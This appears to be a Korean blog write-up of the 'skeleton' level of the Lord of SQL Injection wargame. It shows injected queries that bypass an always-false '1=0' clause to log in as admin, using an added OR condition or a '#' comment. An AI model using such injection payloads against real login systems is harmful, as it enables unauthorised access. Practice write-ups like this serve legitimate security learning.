▶ 코드 확인
좀 심각하게 쉬워져서 어이가 없는 문제였다. 뒤에 반드시 거짓인 1=0 가 있다. 간단히 id='guest and pw='' 와 1=0 사이에 or과 id='admin'을 넣고 id='admin' 혼자만 참이 되면 id='admin'에 해당하는 쿼리를 수행할 것임은 쉽게 생각할 수 있다. 또한, 주석처리 기호 필터링이 없으므로 #(%23)을 넣어서 1=0 부분을 날려서 id='admin'만 참이 되는 쿼리문을 구성할 수도 있다.
▶ 풀이
| select id from prob_skeleton where id='admin and pw='' or id='admin' or '1'='1' and 1=0 select id from prob_skeleton where id='admin and pw='' or id='admin'#' and 1=0 |
위 예시와 같이 쿼리문을 구성하게 되면 손쉽게 클리어할 수 있다.
'write-ups > Lord of SQL Injection' 카테고리의 다른 글
| LORD OF SQLINJECTION - darkknight (0) | 2023.01.01 |
|---|---|
| LORD OF SQLINJECTION - golem (0) | 2022.12.05 |
| LORD OF SQLINJECTION - vampire (0) | 2022.11.29 |
| LORD OF SQLINJECTION - troll (0) | 2022.11.28 |
| LORD OF SQLINJECTION - ORGE (0) | 2022.11.26 |
댓글